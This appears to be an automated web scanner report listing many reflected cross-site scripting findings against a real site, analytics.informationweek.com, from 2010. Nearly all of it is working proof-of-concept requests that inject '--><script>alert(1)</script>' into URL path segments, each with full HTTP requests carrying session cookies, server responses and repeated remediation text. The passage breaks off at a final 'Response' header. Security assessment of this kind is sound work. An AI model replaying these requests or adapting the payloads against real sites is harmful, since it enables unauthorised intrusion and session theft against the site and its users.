<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cs.informationweek.com%2Fcss%2FprettyPhoto.css6cd90--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee12e4455fca&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload eb92e--><script>alert(1)</script>cf8dc57c4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ce=http%3A%2F%2Fanalytics.informationweek.com%2Fcsseb92e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecf8dc57c4b%2Fstyle.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/csseb92e--><script>alert(1)</script>cf8dc57c4b/style.css"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 11fb0--><script>alert(1)</script>769c3628931 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css/style.css11fb0--><script>alert(1)</script>769c3628931 HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fcss%2Fstyle.css11fb0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E769c3628931&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css/style.css11fb0--><script>alert(1)</script>769c3628931"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 94804--><script>alert(1)</script>7e3b598135e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /gsearch94804--><script>alert(1)</script>7e3b598135e HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:43:47 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 45847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rvice=http%3A%2F%2Fanalytics.informationweek.com%2Fgsearch94804--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e3b598135e&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/gsearch94804--><script>alert(1)</script>7e3b598135e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 73f79--><script>alert(1)</script>30362e0897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index73f79--><script>alert(1)</script>30362e0897/caslogin HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:21:40 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:21:40 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... http%3A%2F%2Fanalytics.informationweek.com%2Findex73f79--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E30362e0897%2Fcaslogin&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index73f79--><script>alert(1)</script>30362e0897/caslogin"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload d2619--><script>alert(1)</script>69a69bed269 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index/caslogind2619--><script>alert(1)</script>69a69bed269 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=More%20than%207%20days; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:21:47 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 46007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2Fanalytics.informationweek.com%2Findex%2Fcaslogind2619--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E69a69bed269&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index/caslogind2619--><script>alert(1)</script>69a69bed269"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fcd39--><script>alert(1)</script>3d3330c2607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /joinfcd39--><script>alert(1)</script>3d3330c2607 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:39:29 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:29 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... gin?service=http%3A%2F%2Fanalytics.informationweek.com%2Fjoinfcd39--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3d3330c2607&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/joinfcd39--><script>alert(1)</script>3d3330c2607"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fbbbc--><script>alert(1)</script>3cd9c91875d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ce=http%3A%2F%2Fanalytics.informationweek.com%2Fjsfbbbc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3cd9c91875d%2Fgetdata.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2750a--><script>alert(1)</script>2ac3af659de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/getdata.js2750a--><script>alert(1)</script>2ac3af659de HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fjs%2Fgetdata.js2750a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ac3af659de&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/getdata.js2750a--><script>alert(1)</script>2ac3af659de"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e0a5--><script>alert(1)</script>6251c524583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... A%2F%2Fanalytics.informationweek.com%2Fjs9e0a5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6251c524583%2Fjquery-1.3.1.min.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload e723d--><script>alert(1)</script>c3717aeb084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084 HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ormationweek.com%2Fjs%2Fjquery-1.3.1.min.jse723d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec3717aeb084&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d91ad--><script>alert(1)</script>877e6cf0607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fjsd91ad--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E877e6cf0607%2Fjquery.prettyPhoto.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a7297--><script>alert(1)</script>0f839360ee4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4 HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... tionweek.com%2Fjs%2Fjquery.prettyPhoto.jsa7297--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f839360ee4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 31bd7--><script>alert(1)</script>ccf4cc96713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:22 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:22 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3Eccf4cc96713%2F1%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload c5371--><script>alert(1)</script>435eecb50aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:35 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:35 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Cscript%3Ealert%281%29%3C%2Fscript%3E435eecb50aa%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e86ed--><script>alert(1)</script>a235d674e47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:52 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Cscript%3Ealert%281%29%3C%2Fscript%3Ea235d674e47%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 772ba--><script>alert(1)</script>2d612bfec11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
